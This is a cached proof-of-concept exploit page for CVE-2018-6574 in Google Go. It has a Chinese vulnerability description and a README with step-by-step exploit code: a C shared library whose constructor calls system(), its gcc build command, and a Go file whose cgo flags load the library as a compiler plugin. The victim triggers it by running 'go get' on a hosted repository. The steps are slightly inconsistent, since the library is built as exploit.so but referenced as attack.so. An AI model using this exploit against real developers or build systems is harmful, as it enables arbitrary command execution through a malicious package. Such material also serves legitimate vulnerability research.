CVE-2018-6574 PoC — Google Go 安全漏洞

Source

https://github.com/ItsFadinG/CVE-2018-6574

Associated Vulnerability

Title:Google Go 安全漏洞 (CVE-2018-6574)
Description:Google Go是美国谷歌（Google）公司的一种针对多处理器系统应用程序的编程进行了优化的编程语言。 Google Go 1.8.7之前版本、1.9.4之前的1.9.x版本和1.10rc2之前的1.10 pre-releases版本中存在安全漏洞。远程攻击者可利用该漏洞执行命令。

Readme

# CVE-2018-6574 POC

Exploit POC For CVE-2018-6574

## Compile

1. Create an exploit file with the following:
```c
#include<stdio.h>
#include<stdlib.h>

static void malicious() __attribute__((constructor));

void malicious() {
    system("COMMAND");
}
```
2. Compile it:
```bash
gcc -shared -o exploit.so -fPIC exploit.c
```
3. Finally, you need the go code that will tell cgo to use your plugin:
```go
package main
// #cgo CFLAGS: -fplugin=./attack.so
// typedef int (*intFunc) ();
//
// int
// bridge_int_func(intFunc f)
// {
//      return f();
// }
//
// int fortytwo()
// {
//      return 42;
// }
import "C"
import "fmt"

func main() {
    f := C.intFunc(C.fortytwo)
    fmt.Println(int(C.bridge_int_func(f)))
    // Output: 42
}
```
4. then host in a github and run it to gain command Execution:
```bash
go get github.com/your-repo/CVE-2018-6574-POC
```

## VERSION

- before 1.8.7
- before 1.9.4
- before Go 1.10rc2

## Refrences

- https://nvd.nist.gov/vuln/detail/CVE-2018-6574
- http://blog.nsfocus.net/cve-2018-6574/

File Snapshot


 [4.0K]  /data/pocs/cc1348097b2c7b94cb552a90f8d398adc30f8991
├── [ 187]  exploit.c
├── [ 16K]  exploit.so
├── [ 334]  main.go
└── [1.0K]  README.md

0 directories, 4 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!